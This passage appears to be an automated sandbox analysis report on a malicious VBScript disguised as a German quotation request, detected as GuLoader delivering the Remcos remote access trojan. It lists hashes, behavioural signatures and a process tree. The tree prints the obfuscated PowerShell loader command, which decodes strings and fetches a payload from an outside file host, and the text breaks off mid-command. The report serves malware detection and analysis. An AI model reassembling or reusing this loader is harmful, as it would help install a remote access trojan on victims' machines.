Edit tour
Windows
Analysis Report
ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs
Overview
General Information
| Sample name: | ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsrenamed because original name is a hash value |
| Original sample name: | ANGEBOTSANFRAGE (Universitt Klagenfurt) 10-03-2025pdf.vbs |
| Analysis ID: | 1634190 |
| MD5: | 8021cc623d59a1db7f0f3e305f370449 |
| SHA1: | 674669f5ded1c632e1d18b149f902ca41c00fdb2 |
| SHA256: | a354b3d778c617b5abfd7e9717e095053838e9c1e5eed9cc03937a9ca85d97c6 |
| Tags: | DEUgeoRATRemcosRATvbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
Remcos, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7032 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\ANGEB OTSANFRAGE (Universi t#U00e4t K lagenfurt) 10-03-202 5#U00b7pdf .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
PING.EXE (PID: 6416 cmdline: ping Host_ 6637.6637. 6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D) 
conhost.exe (PID: 6436 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 4504 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Unc aramelised ;function Spuledes($ Soncy){ .( $Industriv irksomhede rs) ($Sonc y)} functi on Paining ($Kortform ){$Suprasc apular225= 4;do{$Anci entest+=$K ortform[$S uprascapul ar225];$Su prascapula r225+=5;$R ockerkrig= Format-Lis t} until(! $Kortform[ $Suprascap ular225])$ Ancientest }$Strghand len=Painin g 'ErhvNPo uleHje TCe re.Enclw'; $Strghandl en+=Painin g 'SneaEBr ugbBla cOv rLFin iPr eE ArgNKe lpT';$crav enhearted= Paining ' pplMSt roB enezScoriA raplOverlO weraUdvi/' ;$where=Pa ining ' Ge rT Retl Hy dsBitt1Fas t2';$Cello biose='Car l[Ch.rnSma aeSo ftMon o.EngrSAlf aeA.skr l, nvLy tIOve rCSammEp.a kp,espoTid ,ISu gNB g fTAfseMSoc ABroenCen sA uslGMob ieSljfr.ai r]C mo:Mos a:PolySEsu rESpekcRri nuB,koRKe tiRecotStv dyEa ePTre vrSparoDyf lTEgneOTra pCBlokO Kr yLTryk=S.u a$,uscwBos Hstnke It erD.agE';$ cravenhear ted+=Paini ng 'A,th5 Amy.Hogn0g alg Emp(Ko ntW CapiSk .fnContd.y reoKo pw,r edsUnna Me nsNUretTBu st Beha1Sa ss0Data..p pl0Staa; F or SmagW D isiFestn T il6 ol4Ufo ,;Gyps sse x Nar6Sven 4Amat;M ka ktt.rTekn vMene:afko 1Inve3linj 4Cont. M,v 0Sept)Sex, CrocGSpyt eTtnecAirv kNe.eodato /Uku.2 ou0 Fors1Paar0 Cum0 Dag1 Dipo0Impr1 Hypn LeaF evii ammrB raeeBr,mf Hygo BruxO ro./T yk1A jou3T np4H ogf.Ni e0' ;$Unfaucet ed=Paining 'Roc.UMe, aSBy.neT.k bREven-Gre eAPortG Br aE PhenOrd st';$Disbu rsable=Pai ning 'Pa t hMetetBibl t,rivpF,rs sC.ar: For / Je,/Syri dAilcrAbsy iFrasvForl eHove.Snvr gRickoU,sa oSk vg Can lOxmaedi,t . islcGent oEnf mRaah /G leuTaal cTwan?.tav eConrx .mv p.steoSrh rCarptEmpi =Hvisd Het oFredwMiss n entlRepa oabsta P.r dTilb&Aria i Sard Fr, =Kbte1 Ilm i Mu 7Lgbr dAlt.wAkk fVig RBlok P BemhBema vFejl9B.ut uObol6 kti AR lsAA,su dBorg6 Mos iUniorNava YUtilY Fil 6Def 3Humd bDiktwH dg G Fo,YS.ce eAttr4conc -Simp0 riv QF lkC';$B enzinmotor ernes=Pain ing 'Ere > ';$Industr ivirksomhe ders=Paini ng 'VauliE av Etanyx' ;$Samfunds hjlperens= 'Frednings planerne'; $Cocoon='\ Squarely15 4.Gen';Spu ledes (Pai ning ' A,s $miljgBrne l udeOFlor B hura Til l ,nh:Tri, pHarmASout V tiiOut N DrecSRut = Bonn$Af.ae FlinnPensV ur:AccrAS irtpVag.p FerDSemiaP rept Hica Wee+Out.$A ubacErytOA .ymcUngaoB o,yoGa,nn' );Spuledes (Paining ' R.g$ mic gR jsLSats OGophB oor ATantla ba : Sc mInfi A umMKapsm D ngOrundN rkeISekuS AfklMpart= Fork$T ssD KafiRailS PachB Co u AlloRHin S T lgaA taB RygtlulveE ve.Con,S, salp ummLK beliBemgT Tri( ndi$W el b .lieO pk nPee,Z sa.IAdeln ResMBremoD ,aiTT psOU nterAfg eW o dRFin.NE th e l gsf ord)');Spu ledes (Pai ning $Cell obiose);$D isbursable =$Mammonis m[0];$fore vigende=(P aining 'L ce$Rbd GCh erL parOKv .kbKamgAAl maLVanr:Fo